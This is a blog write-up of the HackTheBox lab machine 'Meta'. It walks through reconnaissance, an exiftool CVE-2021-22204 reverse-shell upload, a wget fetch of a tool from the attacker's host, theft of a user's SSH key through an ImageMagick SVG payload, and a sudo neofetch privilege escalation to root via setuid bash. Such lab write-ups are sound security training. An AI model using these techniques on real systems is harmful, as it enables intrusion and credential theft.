Meta
This is my fourth HTB box Write-up on this blog as well as the first medium difficulty.
Created by Nauten, Meta is CVE based and that's how we get a Foothold, Getting User was the hardest part while root was pretty straightforward.
Reconnaissance
As usual, the first step to extracting information from a machine is through Nmap
nmap -Pn -sC -sV 10.129.102.205
-Pn: treats host as online, in case ICMP is disabled on the machine
-sC: runs default nmap scripts
-sV: this detects the version of services found running on the open ports
We got two services running:
port 22 : OpenSSH 7.9p1
port 80: HTTP Apache httpd
Let's check the web service running on port 80 with our web browser
The IP (10.129.102.205 ) redirects to artcorp.htb however, it's not reachable so we need to add this entry to the /etc/hosts file using nano
Enumeration
The web page has no active link, no "robots.txt", the only hint is something about a Development in progress and a new product being launched named "MetaView". There was no subdirectory with this name, non at all for that matter. why not check for a subdomain. For this, Let's use ffuf.me subdomain wordlist with the command below:
ffuf -w subdomain.txt -u http://artcorp.htb/ -H "Host: Fuzz.artcorp.htb" -fw 1
-w: wordlist to fuzz with
-u: domain
-H: Host header in order to fuzz subdomain
-fw: filter out word length of 1 ( this removes any entry that's not a subdomain from the output)
We got a subdomain dev01, add to /etc/hosts file, open subdomain in browser and we get another webpage, Artcorp Dev Environment
As we can see above metaview is an image upload page, all it does is display the Metadata of the uploaded image, its display is similar to "Exiftool" so there is a possibility of exiftool running in the back-end and returning the image metadata.
After Googling for Exiftool Exploit I found CVE-2021-22204 with a working Poc on Github:
https://github.com/convisolabs/CVE-2021-22204-exiftool
Git cloned the repository, all we have to do is edit the exploit.py file and set IP and port for the reverse shell. Running the Exploit.py script, we get an image.jpg file which is our payload. Now we set up a listening port with netcat and upload the image.jpg file to the dev01.artcorp.htb/metaview page.
After image.jpg upload, we get a shell as www-data, this is not a full user so we have to escalate our privilege to user.
Getting User
Pspy is a program that lets us spy on running processes without having any special privilege, this will allow us to see what scripts or programs are running on the Machine.
To upload this to our target machine we use python server capability on our machine and wget on the remote machine.
On our machine, while in the directory with Pspy, run:
python3 -m http.server
On the remote machine run:
wget http://yourIP:8000/filename
After uploading, use the command "chmod +x pspy" to give the file executable permission, running pspy we see an interesting script named convert_images.sh located in /usr/local/bin/
checking the script with cat command, it "cd" to /var/www/dev01.artcorp.htb/convert_images, runs a program called mogrify which convert any file in the directory to png format, then kills the process (mogrify) after the conversion, in other to make sense of this script we need to know what mogrify is:
We found a CVE for it too on exploit-DB but the payload used is found here, the SVG SML polyglot file.
We copy the poc.svg to the machine the same way we did pspy, after that we copy this file from the upload location to
/var/www/dev01.artcorp.htb/convert_images
PS: Don't transfer your file to this location directly as it will be automatically deleted after a while, as seen in the pspy output.
As we can see below, the files get's executed and we get an output where we have the value of $(id). Confirming that the exploit works, we use this to get user "Thomas" private ssh key and print to file output2
Now we have the ssh key, on our machine we have to do two things:
name the file "id_rsa"
change the file permission to 600 (chmod 600 id_rsa) to make it private
After this, we connect via ssh as user thomas and we have the user.txt flag.
Root Privilege
Now, to escalate our privilege to root using the most common enum "sudo -l", this show all the command the user is allowed to run with root privilege and in this case we have a program named "neofetch", neofetch is a simple program that displays system properties in a fancy way nothing much but this is our ticket to root.
Running neofetch we can see that the config file is saved at ~/.config/neofetch/config.conf
using lsattr command we see that we can actually edit this file so we can input our exploit here. since we can run this program as root, this would escalate our privilege
As seen below, we edited file config.conf and "setuid", this allows thomas run /bin/bash as root since neofetch have root privilege.
XDG_CONFIG_HOME defines the base directory relative to which user-specific configuration files should be stored, we change the $HOME variable to the user config file.
Finally, we run "/bin/bash -p" to gain root access. Bash can preserve the effective userid it was launched with with the -p option, however without it, it will set the effective uid to the actual uid in this case thomas. This will allow the setuid bit to work properly, allowing bash to keep the user to whom it is setuid to that is root.